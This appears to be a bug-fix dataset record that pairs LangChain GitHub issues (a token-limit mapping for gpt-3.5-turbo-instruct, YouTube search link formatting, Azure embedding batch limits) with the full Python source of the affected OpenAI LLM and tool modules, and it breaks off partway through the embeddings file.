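The fix amounts to one more entry in `model_token_mapping`; a sketch (the 4096-token context size matches OpenAI's published limit for `gpt-3.5-turbo-instruct`, but verify against the merged PR):

```python
model_token_mapping = {
    # ... existing entries ...
    "gpt-3.5-turbo-16k-0613": 16385,
    "gpt-3.5-turbo-instruct": 4096,  # new entry for the instruct model
    "text-ada-001": 2049,
    # ... existing entries ...
}
```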
https://github.com/langchain-ai/langchain/issues/10806
https://github.com/langchain-ai/langchain/pull/10808
5d0493f6521a9ab8459e7dcd92828a0353e7d706
c15bbaac3186a41bb74b314e82eb0227fdc9e332
"2023-09-19T23:26:18Z"
python
"2023-09-20T00:03:16Z"
libs/langchain/langchain/llms/openai.py
from __future__ import annotations import logging import sys import warnings from typing import ( AbstractSet, Any, AsyncIterator, Callable, Collection, Dict, Iterator, List, Literal, Mapping, Optional, Set, Tuple, Union, ) from langchain.callbacks.manager import ( AsyncCallbackManagerForLLMRun, CallbackManagerForLLMRun, ) from langchain.llms.base import BaseLLM, create_base_retry_decorator from langchain.pydantic_v1 import Field, root_validator from langchain.schema import Generation, LLMResult from langchain.schema.output import GenerationChunk from langchain.utils import get_from_dict_or_env, get_pydantic_field_names from langchain.utils.utils import build_extra_kwargs logger = logging.getLogger(__name__) def update_token_usage( keys: Set[str], response: Dict[str, Any], token_usage: Dict[str, Any] ) -> None: """Update token usage.""" _keys_to_use = keys.intersection(response["usage"]) for _key in _keys_to_use: if _key not in token_usage: token_usage[_key] = response["usage"][_key] else: token_usage[_key] += response["usage"][_key] def _stream_response_to_generation_chunk( stream_response: Dict[str, Any], ) -> GenerationChunk: """Convert a stream response to a generation chunk.""" return GenerationChunk( text=stream_response["choices"][0]["text"], generation_info=dict( finish_reason=stream_response["choices"][0].get("finish_reason", None), logprobs=stream_response["choices"][0].get("logprobs", None), ), ) def _update_response(response: Dict[str, Any], stream_response: Dict[str, Any]) -> None: """Update response from the stream response.""" response["choices"][0]["text"] += stream_response["choices"][0]["text"] response["choices"][0]["finish_reason"] = stream_response["choices"][0].get( "finish_reason", None ) response["choices"][0]["logprobs"] = stream_response["choices"][0]["logprobs"] def _streaming_response_template() -> Dict[str, Any]: return { "choices": [ { "text": "", "finish_reason": None, "logprobs": None, } ] } def _create_retry_decorator( llm: Union[BaseOpenAI, OpenAIChat], run_manager: Optional[ Union[AsyncCallbackManagerForLLMRun, CallbackManagerForLLMRun] ] = None, ) -> Callable[[Any], Any]: import openai errors = [ openai.error.Timeout, openai.error.APIError, openai.error.APIConnectionError, openai.error.RateLimitError, openai.error.ServiceUnavailableError, ] return create_base_retry_decorator( error_types=errors, max_retries=llm.max_retries, run_manager=run_manager ) def completion_with_retry( llm: Union[BaseOpenAI, OpenAIChat], run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> Any: """Use tenacity to retry the completion call.""" retry_decorator = _create_retry_decorator(llm, run_manager=run_manager) @retry_decorator def _completion_with_retry(**kwargs: Any) -> Any: return llm.client.create(**kwargs) return _completion_with_retry(**kwargs) async def acompletion_with_retry( llm: Union[BaseOpenAI, OpenAIChat], run_manager: Optional[AsyncCallbackManagerForLLMRun] = None, **kwargs: Any, ) -> Any: """Use tenacity to retry the async completion call.""" retry_decorator = _create_retry_decorator(llm, run_manager=run_manager) @retry_decorator async def _completion_with_retry(**kwargs: Any) -> Any: # Use OpenAI's async api https://github.com/openai/openai-python#async-api return await llm.client.acreate(**kwargs) return await _completion_with_retry(**kwargs) class BaseOpenAI(BaseLLM): """Base OpenAI large language model class.""" @property def lc_secrets(self) -> Dict[str, str]: return {"openai_api_key": "OPENAI_API_KEY"} @property def 
lc_serializable(self) -> bool: return True client: Any = None #: :meta private: model_name: str = Field(default="text-davinci-003", alias="model") """Model name to use.""" temperature: float = 0.7 """What sampling temperature to use.""" max_tokens: int = 256 """The maximum number of tokens to generate in the completion. -1 returns as many tokens as possible given the prompt and the models maximal context size.""" top_p: float = 1 """Total probability mass of tokens to consider at each step.""" frequency_penalty: float = 0 """Penalizes repeated tokens according to frequency.""" presence_penalty: float = 0 """Penalizes repeated tokens.""" n: int = 1 """How many completions to generate for each prompt.""" best_of: int = 1 """Generates best_of completions server-side and returns the "best".""" model_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `create` call not explicitly specified.""" openai_api_key: Optional[str] = None openai_api_base: Optional[str] = None openai_organization: Optional[str] = None # to support explicit proxy for OpenAI openai_proxy: Optional[str] = None batch_size: int = 20 """Batch size to use when passing multiple documents to generate.""" request_timeout: Optional[Union[float, Tuple[float, float]]] = None """Timeout for requests to OpenAI completion API. Default is 600 seconds.""" logit_bias: Optional[Dict[str, float]] = Field(default_factory=dict) """Adjust the probability of specific tokens being generated.""" max_retries: int = 6 """Maximum number of retries to make when generating.""" streaming: bool = False """Whether to stream the results or not.""" allowed_special: Union[Literal["all"], AbstractSet[str]] = set() """Set of special tokens that are allowed。""" disallowed_special: Union[Literal["all"], Collection[str]] = "all" """Set of special tokens that are not allowed。""" tiktoken_model_name: Optional[str] = None """The model name to pass to tiktoken when using this class. Tiktoken is used to count the number of tokens in documents to constrain them to be under a certain limit. By default, when set to None, this will be the same as the embedding model name. However, there are some cases where you may want to use this Embedding class with a model name not supported by tiktoken. This can include when using Azure embeddings or when using one of the many model providers that expose an OpenAI-like API but with different models. In those cases, in order to avoid erroring when tiktoken is called, you can specify a model name to use here.""" def __new__(cls, **data: Any) -> Union[OpenAIChat, BaseOpenAI]: # type: ignore """Initialize the OpenAI object.""" model_name = data.get("model_name", "") if ( model_name.startswith("gpt-3.5-turbo") or model_name.startswith("gpt-4") ) and "-instruct" not in model_name: warnings.warn( "You are trying to use a chat model. This way of initializing it is " "no longer supported. 
Instead, please use: "
                "`from langchain.chat_models import ChatOpenAI`"
            )
            return OpenAIChat(**data)
        return super().__new__(cls)

    class Config:
        """Configuration for this pydantic object."""

        allow_population_by_field_name = True

    @root_validator(pre=True)
    def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
        """Build extra kwargs from additional params that were passed in."""
        all_required_field_names = get_pydantic_field_names(cls)
        extra = values.get("model_kwargs", {})
        values["model_kwargs"] = build_extra_kwargs(
            extra, values, all_required_field_names
        )
        return values

    @root_validator()
    def validate_environment(cls, values: Dict) -> Dict:
        """Validate that api key and python package exists in environment."""
        values["openai_api_key"] = get_from_dict_or_env(
            values, "openai_api_key", "OPENAI_API_KEY"
        )
        values["openai_api_base"] = get_from_dict_or_env(
            values,
            "openai_api_base",
            "OPENAI_API_BASE",
            default="",
        )
        values["openai_proxy"] = get_from_dict_or_env(
            values,
            "openai_proxy",
            "OPENAI_PROXY",
            default="",
        )
        values["openai_organization"] = get_from_dict_or_env(
            values,
            "openai_organization",
            "OPENAI_ORGANIZATION",
            default="",
        )
        try:
            import openai

            values["client"] = openai.Completion
        except ImportError:
            raise ImportError(
                "Could not import openai python package. "
                "Please install it with `pip install openai`."
            )
        if values["streaming"] and values["n"] > 1:
            raise ValueError("Cannot stream results when n > 1.")
        if values["streaming"] and values["best_of"] > 1:
            raise ValueError("Cannot stream results when best_of > 1.")
        return values

    @property
    def _default_params(self) -> Dict[str, Any]:
        """Get the default parameters for calling OpenAI API."""
        normal_params = {
            "temperature": self.temperature,
            "max_tokens": self.max_tokens,
            "top_p": self.top_p,
            "frequency_penalty": self.frequency_penalty,
            "presence_penalty": self.presence_penalty,
            "n": self.n,
            "request_timeout": self.request_timeout,
            "logit_bias": self.logit_bias,
        }
        # Azure gpt-35-turbo doesn't support best_of
        # don't specify best_of if it is 1
        if self.best_of > 1:
            normal_params["best_of"] = self.best_of
        return {**normal_params, **self.model_kwargs}

    def _stream(
        self,
        prompt: str,
        stop: Optional[List[str]] = None,
        run_manager: Optional[CallbackManagerForLLMRun] = None,
        **kwargs: Any,
    ) -> Iterator[GenerationChunk]:
        params = {**self._invocation_params, **kwargs, "stream": True}
        self.get_sub_prompts(params, [prompt], stop)  # this mutates params
        for stream_resp in completion_with_retry(
            self, prompt=prompt, run_manager=run_manager, **params
        ):
            chunk = _stream_response_to_generation_chunk(stream_resp)
            yield chunk
            if run_manager:
                run_manager.on_llm_new_token(
                    chunk.text,
                    chunk=chunk,
                    verbose=self.verbose,
                    logprobs=chunk.generation_info["logprobs"]
                    if chunk.generation_info
                    else None,
                )

    async def _astream(
        self,
        prompt: str,
        stop: Optional[List[str]] = None,
        run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
        **kwargs: Any,
    ) -> AsyncIterator[GenerationChunk]:
        params = {**self._invocation_params, **kwargs, "stream": True}
        self.get_sub_prompts(params, [prompt], stop)  # this mutates params
        async for stream_resp in await acompletion_with_retry(
            self, prompt=prompt, run_manager=run_manager, **params
        ):
            chunk = _stream_response_to_generation_chunk(stream_resp)
            yield chunk
            if run_manager:
                await run_manager.on_llm_new_token(
                    chunk.text,
                    chunk=chunk,
                    verbose=self.verbose,
                    logprobs=chunk.generation_info["logprobs"]
                    if chunk.generation_info
                    else None,
                )

    def _generate(
        self,
        prompts: List[str],
        stop: Optional[List[str]] = None,
        run_manager: Optional[CallbackManagerForLLMRun] = None,
        **kwargs: Any,
    ) -> LLMResult:
        """Call out to OpenAI's endpoint with k unique prompts.

        Args:
            prompts: The prompts to pass into the model.
            stop: Optional list of stop words to use when generating.

        Returns:
            The full LLM output.

        Example:
            .. code-block:: python

                response = openai.generate(["Tell me a joke."])
        """
        # TODO: write a unit test for this
        params = self._invocation_params
        params = {**params, **kwargs}
        sub_prompts = self.get_sub_prompts(params, prompts, stop)
        choices = []
        token_usage: Dict[str, int] = {}
        # Get the token usage from the response.
        # Includes prompt, completion, and total tokens used.
        _keys = {"completion_tokens", "prompt_tokens", "total_tokens"}
        for _prompts in sub_prompts:
            if self.streaming:
                if len(_prompts) > 1:
                    raise ValueError("Cannot stream results with multiple prompts.")

                generation: Optional[GenerationChunk] = None
                for chunk in self._stream(_prompts[0], stop, run_manager, **kwargs):
                    if generation is None:
                        generation = chunk
                    else:
                        generation += chunk
                assert generation is not None
                choices.append(
                    {
                        "text": generation.text,
                        "finish_reason": generation.generation_info.get(
                            "finish_reason"
                        )
                        if generation.generation_info
                        else None,
                        "logprobs": generation.generation_info.get("logprobs")
                        if generation.generation_info
                        else None,
                    }
                )
            else:
                response = completion_with_retry(
                    self, prompt=_prompts, run_manager=run_manager, **params
                )
                choices.extend(response["choices"])
                update_token_usage(_keys, response, token_usage)
        return self.create_llm_result(choices, prompts, token_usage)

    async def _agenerate(
        self,
        prompts: List[str],
        stop: Optional[List[str]] = None,
        run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
        **kwargs: Any,
    ) -> LLMResult:
        """Call out to OpenAI's endpoint async with k unique prompts."""
        params = self._invocation_params
        params = {**params, **kwargs}
        sub_prompts = self.get_sub_prompts(params, prompts, stop)
        choices = []
        token_usage: Dict[str, int] = {}
        # Get the token usage from the response.
        # Includes prompt, completion, and total tokens used.
        _keys = {"completion_tokens", "prompt_tokens", "total_tokens"}
        for _prompts in sub_prompts:
            if self.streaming:
                if len(_prompts) > 1:
                    raise ValueError("Cannot stream results with multiple prompts.")

                generation: Optional[GenerationChunk] = None
                async for chunk in self._astream(
                    _prompts[0], stop, run_manager, **kwargs
                ):
                    if generation is None:
                        generation = chunk
                    else:
                        generation += chunk
                assert generation is not None
                choices.append(
                    {
                        "text": generation.text,
                        "finish_reason": generation.generation_info.get(
                            "finish_reason"
                        )
                        if generation.generation_info
                        else None,
                        "logprobs": generation.generation_info.get("logprobs")
                        if generation.generation_info
                        else None,
                    }
                )
            else:
                response = await acompletion_with_retry(
                    self, prompt=_prompts, run_manager=run_manager, **params
                )
                choices.extend(response["choices"])
                update_token_usage(_keys, response, token_usage)
        return self.create_llm_result(choices, prompts, token_usage)

    def get_sub_prompts(
        self,
        params: Dict[str, Any],
        prompts: List[str],
        stop: Optional[List[str]] = None,
    ) -> List[List[str]]:
        """Get the sub prompts for llm call."""
        if stop is not None:
            if "stop" in params:
                raise ValueError("`stop` found in both the input and default params.")
            params["stop"] = stop
        if params["max_tokens"] == -1:
            if len(prompts) != 1:
                raise ValueError(
                    "max_tokens set to -1 not supported for multiple inputs."
                )
            params["max_tokens"] = self.max_tokens_for_prompt(prompts[0])
        sub_prompts = [
            prompts[i : i + self.batch_size]
            for i in range(0, len(prompts), self.batch_size)
        ]
        return sub_prompts

    def create_llm_result(
        self, choices: Any, prompts: List[str], token_usage: Dict[str, int]
    ) -> LLMResult:
        """Create the LLMResult from the choices and prompts."""
        generations = []
        for i, _ in enumerate(prompts):
            sub_choices = choices[i * self.n : (i + 1) * self.n]
            generations.append(
                [
                    Generation(
                        text=choice["text"],
                        generation_info=dict(
                            finish_reason=choice.get("finish_reason"),
                            logprobs=choice.get("logprobs"),
                        ),
                    )
                    for choice in sub_choices
                ]
            )
        llm_output = {"token_usage": token_usage, "model_name": self.model_name}
        return LLMResult(generations=generations, llm_output=llm_output)

    @property
    def _invocation_params(self) -> Dict[str, Any]:
        """Get the parameters used to invoke the model."""
        openai_creds: Dict[str, Any] = {
            "api_key": self.openai_api_key,
            "api_base": self.openai_api_base,
            "organization": self.openai_organization,
        }
        if self.openai_proxy:
            import openai

            openai.proxy = {"http": self.openai_proxy, "https": self.openai_proxy}  # type: ignore[assignment]  # noqa: E501
        return {**openai_creds, **self._default_params}

    @property
    def _identifying_params(self) -> Mapping[str, Any]:
        """Get the identifying parameters."""
        return {**{"model_name": self.model_name}, **self._default_params}

    @property
    def _llm_type(self) -> str:
        """Return type of llm."""
        return "openai"

    def get_token_ids(self, text: str) -> List[int]:
        """Get the token IDs using the tiktoken package."""
        # tiktoken NOT supported for Python < 3.8
        if sys.version_info[1] < 8:
            return super().get_num_tokens(text)
        try:
            import tiktoken
        except ImportError:
            raise ImportError(
                "Could not import tiktoken python package. "
                "This is needed in order to calculate get_num_tokens. "
                "Please install it with `pip install tiktoken`."
            )

        model_name = self.tiktoken_model_name or self.model_name
        try:
            enc = tiktoken.encoding_for_model(model_name)
        except KeyError:
            logger.warning("Warning: model not found. Using cl100k_base encoding.")
            model = "cl100k_base"
            enc = tiktoken.get_encoding(model)

        return enc.encode(
            text,
            allowed_special=self.allowed_special,
            disallowed_special=self.disallowed_special,
        )

    @staticmethod
    def modelname_to_contextsize(modelname: str) -> int:
        """Calculate the maximum number of tokens possible to generate for a model.

        Args:
            modelname: The modelname we want to know the context size for.

        Returns:
            The maximum context size

        Example:
            .. code-block:: python

                max_tokens = openai.modelname_to_contextsize("text-davinci-003")
        """
        model_token_mapping = {
            "gpt-4": 8192,
            "gpt-4-0314": 8192,
            "gpt-4-0613": 8192,
            "gpt-4-32k": 32768,
            "gpt-4-32k-0314": 32768,
            "gpt-4-32k-0613": 32768,
            "gpt-3.5-turbo": 4096,
            "gpt-3.5-turbo-0301": 4096,
            "gpt-3.5-turbo-0613": 4096,
            "gpt-3.5-turbo-16k": 16385,
            "gpt-3.5-turbo-16k-0613": 16385,
            "text-ada-001": 2049,
            "ada": 2049,
            "text-babbage-001": 2049,
            "babbage": 2049,
            "text-curie-001": 2049,
            "curie": 2049,
            "davinci": 2049,
            "text-davinci-003": 4097,
            "text-davinci-002": 4097,
            "code-davinci-002": 8001,
            "code-davinci-001": 8001,
            "code-cushman-002": 2048,
            "code-cushman-001": 2048,
        }

        # handling finetuned models
        if "ft-" in modelname:
            modelname = modelname.split(":")[0]

        context_size = model_token_mapping.get(modelname, None)

        if context_size is None:
            raise ValueError(
                f"Unknown model: {modelname}. Please provide a valid OpenAI model name."
                "Known models are: " + ", ".join(model_token_mapping.keys())
            )

        return context_size

    @property
    def max_context_size(self) -> int:
        """Get max context size for this model."""
        return self.modelname_to_contextsize(self.model_name)

    def max_tokens_for_prompt(self, prompt: str) -> int:
        """Calculate the maximum number of tokens possible to generate for a prompt.

        Args:
            prompt: The prompt to pass into the model.

        Returns:
            The maximum number of tokens to generate for a prompt.

        Example:
            .. code-block:: python

                max_tokens = openai.max_token_for_prompt("Tell me a joke.")
        """
        num_tokens = self.get_num_tokens(prompt)
        return self.max_context_size - num_tokens


class OpenAI(BaseOpenAI):
    """OpenAI large language models.

    To use, you should have the ``openai`` python package installed, and the
    environment variable ``OPENAI_API_KEY`` set with your API key.

    Any parameters that are valid to be passed to the openai.create call can be passed
    in, even if not explicitly saved on this class.

    Example:
        .. code-block:: python

            from langchain.llms import OpenAI
            openai = OpenAI(model_name="text-davinci-003")
    """

    @property
    def _invocation_params(self) -> Dict[str, Any]:
        return {**{"model": self.model_name}, **super()._invocation_params}


class AzureOpenAI(BaseOpenAI):
    """Azure-specific OpenAI large language models.

    To use, you should have the ``openai`` python package installed, and the
    environment variable ``OPENAI_API_KEY`` set with your API key.

    Any parameters that are valid to be passed to the openai.create call can be passed
    in, even if not explicitly saved on this class.

    Example:
        .. code-block:: python

            from langchain.llms import AzureOpenAI
            openai = AzureOpenAI(model_name="text-davinci-003")
    """

    deployment_name: str = ""
    """Deployment name to use."""
    openai_api_type: str = ""
    openai_api_version: str = ""

    @root_validator()
    def validate_azure_settings(cls, values: Dict) -> Dict:
        values["openai_api_version"] = get_from_dict_or_env(
            values,
            "openai_api_version",
            "OPENAI_API_VERSION",
        )
        values["openai_api_type"] = get_from_dict_or_env(
            values, "openai_api_type", "OPENAI_API_TYPE", "azure"
        )
        return values

    @property
    def _identifying_params(self) -> Mapping[str, Any]:
        return {
            **{"deployment_name": self.deployment_name},
            **super()._identifying_params,
        }

    @property
    def _invocation_params(self) -> Dict[str, Any]:
        openai_params = {
            "engine": self.deployment_name,
            "api_type": self.openai_api_type,
            "api_version": self.openai_api_version,
        }
        return {**openai_params, **super()._invocation_params}

    @property
    def _llm_type(self) -> str:
        """Return type of llm."""
        return "azure"


class OpenAIChat(BaseLLM):
    """OpenAI Chat large language models.

    To use, you should have the ``openai`` python package installed, and the
    environment variable ``OPENAI_API_KEY`` set with your API key.

    Any parameters that are valid to be passed to the openai.create call can be passed
    in, even if not explicitly saved on this class.

    Example:
        .. code-block:: python

            from langchain.llms import OpenAIChat
            openaichat = OpenAIChat(model_name="gpt-3.5-turbo")
    """

    client: Any  #: :meta private:
    model_name: str = "gpt-3.5-turbo"
    """Model name to use."""
    model_kwargs: Dict[str, Any] = Field(default_factory=dict)
    """Holds any model parameters valid for `create` call not explicitly specified."""
    openai_api_key: Optional[str] = None
    openai_api_base: Optional[str] = None
    # to support explicit proxy for OpenAI
    openai_proxy: Optional[str] = None
    max_retries: int = 6
    """Maximum number of retries to make when generating."""
    prefix_messages: List = Field(default_factory=list)
    """Series of messages for Chat input."""
    streaming: bool = False
    """Whether to stream the results or not."""
    allowed_special: Union[Literal["all"], AbstractSet[str]] = set()
    """Set of special tokens that are allowed."""
    disallowed_special: Union[Literal["all"], Collection[str]] = "all"
    """Set of special tokens that are not allowed."""

    @root_validator(pre=True)
    def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
        """Build extra kwargs from additional params that were passed in."""
        all_required_field_names = {field.alias for field in cls.__fields__.values()}

        extra = values.get("model_kwargs", {})
        for field_name in list(values):
            if field_name not in all_required_field_names:
                if field_name in extra:
                    raise ValueError(f"Found {field_name} supplied twice.")
                extra[field_name] = values.pop(field_name)
        values["model_kwargs"] = extra
        return values

    @root_validator()
    def validate_environment(cls, values: Dict) -> Dict:
        """Validate that api key and python package exists in environment."""
        openai_api_key = get_from_dict_or_env(
            values, "openai_api_key", "OPENAI_API_KEY"
        )
        openai_api_base = get_from_dict_or_env(
            values,
            "openai_api_base",
            "OPENAI_API_BASE",
            default="",
        )
        openai_proxy = get_from_dict_or_env(
            values,
            "openai_proxy",
            "OPENAI_PROXY",
            default="",
        )
        openai_organization = get_from_dict_or_env(
            values, "openai_organization", "OPENAI_ORGANIZATION", default=""
        )
        try:
            import openai

            openai.api_key = openai_api_key
            if openai_api_base:
                openai.api_base = openai_api_base
            if openai_organization:
                openai.organization = openai_organization
            if openai_proxy:
                openai.proxy = {"http": openai_proxy, "https": openai_proxy}  # type: ignore[assignment]  # noqa: E501
        except ImportError:
            raise ImportError(
                "Could not import openai python package. "
                "Please install it with `pip install openai`."
            )
        try:
            values["client"] = openai.ChatCompletion
        except AttributeError:
            raise ValueError(
                "`openai` has no `ChatCompletion` attribute, this is likely "
                "due to an old version of the openai package. Try upgrading it "
                "with `pip install --upgrade openai`."
            )
        warnings.warn(
            "You are trying to use a chat model. This way of initializing it is "
            "no longer supported. Instead, please use: "
            "`from langchain.chat_models import ChatOpenAI`"
        )
        return values

    @property
    def _default_params(self) -> Dict[str, Any]:
        """Get the default parameters for calling OpenAI API."""
        return self.model_kwargs

    def _get_chat_params(
        self, prompts: List[str], stop: Optional[List[str]] = None
    ) -> Tuple:
        if len(prompts) > 1:
            raise ValueError(
                f"OpenAIChat currently only supports single prompt, got {prompts}"
            )
        messages = self.prefix_messages + [{"role": "user", "content": prompts[0]}]
        params: Dict[str, Any] = {**{"model": self.model_name}, **self._default_params}
        if stop is not None:
            if "stop" in params:
                raise ValueError("`stop` found in both the input and default params.")
            params["stop"] = stop
        if params.get("max_tokens") == -1:
            # for ChatGPT api, omitting max_tokens is equivalent to having no limit
            del params["max_tokens"]
        return messages, params

    def _stream(
        self,
        prompt: str,
        stop: Optional[List[str]] = None,
        run_manager: Optional[CallbackManagerForLLMRun] = None,
        **kwargs: Any,
    ) -> Iterator[GenerationChunk]:
        messages, params = self._get_chat_params([prompt], stop)
        params = {**params, **kwargs, "stream": True}
        for stream_resp in completion_with_retry(
            self, messages=messages, run_manager=run_manager, **params
        ):
            token = stream_resp["choices"][0]["delta"].get("content", "")
            chunk = GenerationChunk(text=token)
            yield chunk
            if run_manager:
                run_manager.on_llm_new_token(token, chunk=chunk)

    async def _astream(
        self,
        prompt: str,
        stop: Optional[List[str]] = None,
        run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
        **kwargs: Any,
    ) -> AsyncIterator[GenerationChunk]:
        messages, params = self._get_chat_params([prompt], stop)
        params = {**params, **kwargs, "stream": True}
        async for stream_resp in await acompletion_with_retry(
            self, messages=messages, run_manager=run_manager, **params
        ):
            token = stream_resp["choices"][0]["delta"].get("content", "")
            chunk = GenerationChunk(text=token)
            yield chunk
            if run_manager:
                await run_manager.on_llm_new_token(token, chunk=chunk)

    def _generate(
        self,
        prompts: List[str],
        stop: Optional[List[str]] = None,
        run_manager: Optional[CallbackManagerForLLMRun] = None,
        **kwargs: Any,
    ) -> LLMResult:
        if self.streaming:
            generation: Optional[GenerationChunk] = None
            for chunk in self._stream(prompts[0], stop, run_manager, **kwargs):
                if generation is None:
                    generation = chunk
                else:
                    generation += chunk
            assert generation is not None
            return LLMResult(generations=[[generation]])

        messages, params = self._get_chat_params(prompts, stop)
        params = {**params, **kwargs}
        full_response = completion_with_retry(
            self, messages=messages, run_manager=run_manager, **params
        )
        llm_output = {
            "token_usage": full_response["usage"],
            "model_name": self.model_name,
        }
        return LLMResult(
            generations=[
                [Generation(text=full_response["choices"][0]["message"]["content"])]
            ],
            llm_output=llm_output,
        )

    async def _agenerate(
        self,
        prompts: List[str],
        stop: Optional[List[str]] = None,
        run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
        **kwargs: Any,
    ) -> LLMResult:
        if self.streaming:
            generation: Optional[GenerationChunk] = None
            async for chunk in self._astream(prompts[0], stop, run_manager, **kwargs):
                if generation is None:
                    generation = chunk
                else:
                    generation += chunk
            assert generation is not None
            return LLMResult(generations=[[generation]])

        messages, params = self._get_chat_params(prompts, stop)
        params = {**params, **kwargs}
        full_response = await acompletion_with_retry(
            self, messages=messages, run_manager=run_manager, **params
        )
        llm_output = {
            "token_usage": full_response["usage"],
            "model_name": self.model_name,
        }
        return LLMResult(
            generations=[
                [Generation(text=full_response["choices"][0]["message"]["content"])]
            ],
            llm_output=llm_output,
        )

    @property
    def _identifying_params(self) -> Mapping[str, Any]:
        """Get the identifying parameters."""
        return {**{"model_name": self.model_name}, **self._default_params}

    @property
    def _llm_type(self) -> str:
        """Return type of llm."""
        return "openai-chat"

    def get_token_ids(self, text: str) -> List[int]:
        """Get the token IDs using the tiktoken package."""
        # tiktoken NOT supported for Python < 3.8
        if sys.version_info[1] < 8:
            return super().get_token_ids(text)
        try:
            import tiktoken
        except ImportError:
            raise ImportError(
                "Could not import tiktoken python package. "
                "This is needed in order to calculate get_num_tokens. "
                "Please install it with `pip install tiktoken`."
            )

        enc = tiktoken.encoding_for_model(self.model_name)
        return enc.encode(
            text,
            allowed_special=self.allowed_special,
            disallowed_special=self.disallowed_special,
        )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,742
Update return parameter of YouTubeSearchTool
### Feature request Return the YouTube video links in full format like `https://www.youtube.com/watch?v=VIDEO_ID`; currently the links are like `/watch?v=VIDEO_ID`. Return the links as a list like `['link1', 'link2']`; currently the whole list is returned as a string, `"['link1', 'link2']"`. ### Motivation If the links returned are exactly the same as **direct links to YouTube in a list** rather than a string, I can avoid the hassle of processing them again to convert them to the required format. ### Your contribution I will change the code a bit and open a pull request.
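A minimal sketch of the output format the request asks for; the helper name is hypothetical and only illustrates turning `url_suffix` values into full watch URLs inside a real list:

```python
from typing import List

def to_full_urls(url_suffixes: List[str]) -> List[str]:
    # Hypothetical helper: prepend the YouTube host to each suffix and
    # return an actual list instead of its str() representation.
    return ["https://www.youtube.com" + suffix for suffix in url_suffixes]

print(to_full_urls(["/watch?v=VIDEO_ID"]))
# ['https://www.youtube.com/watch?v=VIDEO_ID']
```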
https://github.com/langchain-ai/langchain/issues/10742
https://github.com/langchain-ai/langchain/pull/10743
1dae3c383ed17b0a2e4675accf396bc73834de75
740eafe41da7317f42387bdfe6d0f1f521f2cafd
"2023-09-18T17:47:53Z"
python
"2023-09-20T00:04:06Z"
libs/langchain/langchain/tools/youtube/search.py
""" Adapted from https://github.com/venuv/langchain_yt_tools CustomYTSearchTool searches YouTube videos related to a person and returns a specified number of video URLs. Input to this tool should be a comma separated list, - the first part contains a person name - and the second(optional) a number that is the maximum number of video results to return """ import json from typing import Optional from langchain.callbacks.manager import CallbackManagerForToolRun from langchain.tools import BaseTool class YouTubeSearchTool(BaseTool): """Tool that queries YouTube.""" name: str = "youtube_search" description: str = ( "search for youtube videos associated with a person. " "the input to this tool should be a comma separated list, " "the first part contains a person name and the second a " "number that is the maximum number of video results " "to return aka num_results. the second part is optional" ) def _search(self, person: str, num_results: int) -> str: from youtube_search import YoutubeSearch results = YoutubeSearch(person, num_results).to_json() data = json.loads(results) url_suffix_list = [video["url_suffix"] for video in data["videos"]] return str(url_suffix_list) def _run( self, query: str, run_manager: Optional[CallbackManagerForToolRun] = None, ) -> str: """Use the tool.""" values = query.split(",") person = values[0] if len(values) > 1: num_results = int(values[1]) else: num_results = 2 return self._search(person, num_results)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,575
AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1.
### System Info Langchain version == 0.0.166 Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2 LLM = AzureOpenAI ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to reproduce: 1. Set up Azure OpenAI embeddings by providing the key, version, etc. 2. Load a document with a loader 3. Set up a text splitter so you get more than 2 documents 4. Add them to chromadb with `.add_documents(List<Document>)` This is some example code: ```py pdf = PyPDFLoader(url) documents = pdf.load() text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0) texts = text_splitter.split_documents(documents) vectordb.add_documents(texts) vectordb.persist() ``` ### Expected behavior Embeddings should be added to the database; instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.` This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once. The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214 The input should be a one-dimensional array, not multi-dimensional.
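A commonly suggested workaround while the Azure endpoint rejects batched inputs is to force one input per request through the existing `chunk_size` field; a sketch, with the deployment name as a placeholder:

```python
from langchain.embeddings import OpenAIEmbeddings

# chunk_size=1 makes each request carry a single input, which stays within
# Azure's "max number of inputs is 1" limit at the cost of more round trips.
embeddings = OpenAIEmbeddings(
    deployment="your-embeddings-deployment-name",  # placeholder
    chunk_size=1,
)
```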
https://github.com/langchain-ai/langchain/issues/4575
https://github.com/langchain-ai/langchain/pull/10707
7395c2845549f77a3b52d9d7f0d70c88bed5817a
f0198354d93e7ba8b615b8fd845223c88ea4ed2b
"2023-05-12T12:38:50Z"
python
"2023-09-20T04:50:39Z"
libs/langchain/langchain/embeddings/openai.py
from __future__ import annotations

import logging
import warnings
from typing import (
    Any,
    Callable,
    Dict,
    List,
    Literal,
    Optional,
    Sequence,
    Set,
    Tuple,
    Union,
)

import numpy as np
from tenacity import (
    AsyncRetrying,
    before_sleep_log,
    retry,
    retry_if_exception_type,
    stop_after_attempt,
    wait_exponential,
)

from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names

logger = logging.getLogger(__name__)


def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]:
    import openai

    min_seconds = 4
